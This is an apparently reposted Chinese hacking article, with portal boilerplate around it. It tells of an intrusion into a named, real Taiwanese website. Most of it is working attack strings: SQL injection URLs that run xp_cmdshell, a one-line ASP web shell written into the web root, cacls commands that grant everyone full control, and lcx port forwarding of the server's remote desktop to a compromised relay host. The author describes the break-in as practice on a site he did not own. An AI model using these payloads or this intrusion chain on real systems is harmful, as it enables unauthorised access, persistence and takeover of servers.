• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    公众号

ASP.NET注入 台@@湾 站

原作者: [db:作者] 来自: [db:来源] 收藏 邀请
 ASP.NET注入 台@@湾 站
                                              
题目:Asp.net注入 台@@湾 站
作者:冷颜

此文章已发表在《黑客X档案》2008年第5期杂志上
如转载请务必保留此信息!


一次在渗透群里看到小天同学放出一个被他挂了txt的 台@@湾 站,看了下发现是个ASP.NET的整站系统,问了一下他情况,据说是权限设置有点BT,一直拿不到webshell。因为之前有看过
    一次在渗透群里看到小天同学放出一个被他挂了txt的 台@@湾 站,看了下发现是个ASP.NET的整站系统,问了一下他情况,据说是权限设置有点BT,一直拿不到webshell。因为之前有看过一些aspx的注入教程,正好可以练练手,于是有了下面的文章。

一.注入检测
   随便打开个带参数链接,加入单引号,立刻出现了错误(图1)。接着提交
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’ and (select @@version)>0 and ’’=’
暴出了MS SQL SERVER的版本,确定服务器采用的是ASP.NET+MS SQLSERVER架构(图2)。
这下好办了,依次提交下面地址。得到数据库名newkuai和当前数据库用户sa(图3)。
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’ and db_name()>0 and ’’=’
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’ and system_user>0 and ’’=’
sa大家都应该相当熟悉了吧,如果它的权限是默认设置的话权限是相当高的,可以调用SQL SERVER里所有的存储过程,其中最重要的莫过于xp_cmdshell了。现在这种情况最理想的办法就是利用xp_cmdshell加个管理员,然后远程登陆3389了,但是现实往往是残酷的,不然小天同学也不至于连个webshell都拿不了。用BluePortScan扫了下1到10000的端口,居然什么端口都没扫到,十有八九是防火墙隔开了,没办法只好继续下去。
   现在权限有了,接下来就到找web路径。ASP.NET暴网站路径比较有意思,许多没配置好的服务器只要在ASPX文件前面加个’~’符号它就会暴出找不到文件的错误,从而暴露了网站的物理路径。提交下面地址,暴出了网站的路径C:\Inetpub\wwwroot\web\newkuai\(图4)。
http://www.kuai-kuai.com.tw/~NewsDetail.aspx?id=19

二.打破权限配置
   现在有了WEB路径,尝试向WEB目录写入文件,顺便测试下xp_cmdshell有没被删除。先查看下本机的ip地址,提交下面地址,然后通过访问ip.txt就可以看到命令的执行结果了,发现ip.txt成功写入的同时也确定了该服务器放在了内网(图5)。
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’;exec master.dbo.xp_cmdshell ’ipconfig > C:\Inetpub\wwwroot\web\newkuai\1.asp’--

接着写入一句话小马,
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’;exec master.dbo.xp_cmdshell ’echo ^<%25execute request("l")%25^> > C:\Inetpub\wwwroot\web\newkuai\1.asp’--
再从IE访问1.asp,成功写入了,于是尝试提交个大马,结果提示写入文件失败,连续换了几个目录都同样失败了,应该是管理员限制了整个WEB目录的写入权限了(图6)。没有了写入权限,意味着连文件都不能上传,造成的不便可想而知。但是没关系,它的目录不让写入,那就我们自己来创建一个完全控制权的目录。
  先创建一个目录’hack’,然后看下它在WEB目录下的权限设置,依次提交下面URL,可以看到hack目录默认情况下只有读取权限(图7)。
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’;exec master.dbo.xp_cmdshell ’mkdir C:\Inetpub\wwwroot\web\newkuai\hack’--
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’;exec master.dbo.xp_cmdshell ’cacls C:\Inetpub\wwwroot\web\newkuai\hack > C:\Inetpub\wwwroot\web\newkuai\1.txt’--
 
  接下来要用到一个NTFS下才能用的权限配置命令CACLS,命令的基本用法如下。

C:\>cacls
显示或者修改文件的访问控制表(ACL)

CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]
               [/P user:perm [...]] [/D user [...]]
   filename      显示 ACL。
   /T            更改当前目录及其所有子目录中
                 指定文件的 ACL。
   /E            编辑 ACL 而不替换。
   /C            在出现拒绝访问错误时继续。
   /G user:perm  赋予指定用户访问权限。
                 Perm 可以是: R  读取
                              W  写入
                              C  更改(写入)
                              F  完全控制
   /R user       撤销指定用户的访问权限(仅在与 /E 一起使用时合法)。
   /P user:perm  替换指定用户的访问权限。
                 Perm 可以是: N  无
                              R  读取
                              W  写入
                              C  更改(写入)
                              F  完全控制
   /D user       拒绝指定用户的访问。

网上也有很多关于使用CACLS来进行提权的办法,但是测试后发现网上所说的命令’CACLS D: /E /T /G everyone:F’并不能通用,下面是我自己对该命令用法的一些总结。
CACLS只加参数/G后直接执行会出现一个是否执行的提示,因为我们在注入里不能键入确定,因此cacls往往没有执行。加入参数 /E /G后将不会出现提示而直接执行,但是参数 /E 的作用是编辑ACL而不替换已赋予的用户权限,而我们本身目录里已经包含了’everyone:R’的权限设置,所以执行后仍然是’everyone:R’。这种情况下,我们首先要用 /D 参数先把要赋权的用户拒绝访问,然后再执行赋权。
依次提交,
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’;exec master.dbo.xp_cmdshell ’cacls C:\Inetpub\wwwroot\web\newkuai\hack /e /d everyone’--
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’;exec master.dbo.xp_cmdshell ’cacls C:\Inetpub\wwwroot\web\newkuai\hack /e /g everyone:F’--
执行后成功把完全控制权限赋予了everyone,可以从图8和图9里看到’hack’目录前后控制权限的变化,接着再用一句话小马提交数据的时候已经可以写入了(图10)。

三.完完全全的入侵
   相信每个爱好入侵的朋友都一样,喜欢渗透到底,当然我也不会例外。有了写入的权限加上SA,后面的入侵也变得顺利成章了。先是确认服务器终端服务有启动并且端口是3389,然后换上大马上传端口转发工具lcx.exe,准备将服务器的3389的端口转发出来,因为我没有公网IP,所以再把lcx上传到有公网IP的肉鸡上进行监听。简单说下LCX的转发原理和使用方法,首先在肉鸡上的命令行下执行lcx -listen 51 880 ,作用是把监听到的发往本机51端口的数据传送到本机的880端口,而在 台@@湾 站上要执行的命令格式是lcx -slave 肉鸡IP 51 本机IP 3389,意思是把本机的3389端口传送到指定肉鸡的51端口上,而我们只需要在肉鸡上用远程桌面连接本地的880(127.0.0.1:880)端口就可以登陆到 台@@湾 服务器上了。提交以下地址执行lcx,最后利用自己添加的管理员帐号成功登陆到 台@@湾 站上(图11)。
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19’;exec master.dbo.xp_cmdshell ’C:\Inetpub\wwwroot\web\newkuai\lcx.exe -slave 222.240.166.xxx 51 192.168.1.2 3389’--


鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
Asp.Net創建和應用主題发布时间:2022-07-10
下一篇:
ASP.net学习路线(详细)发布时间:2022-07-10
热门推荐
热门话题
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap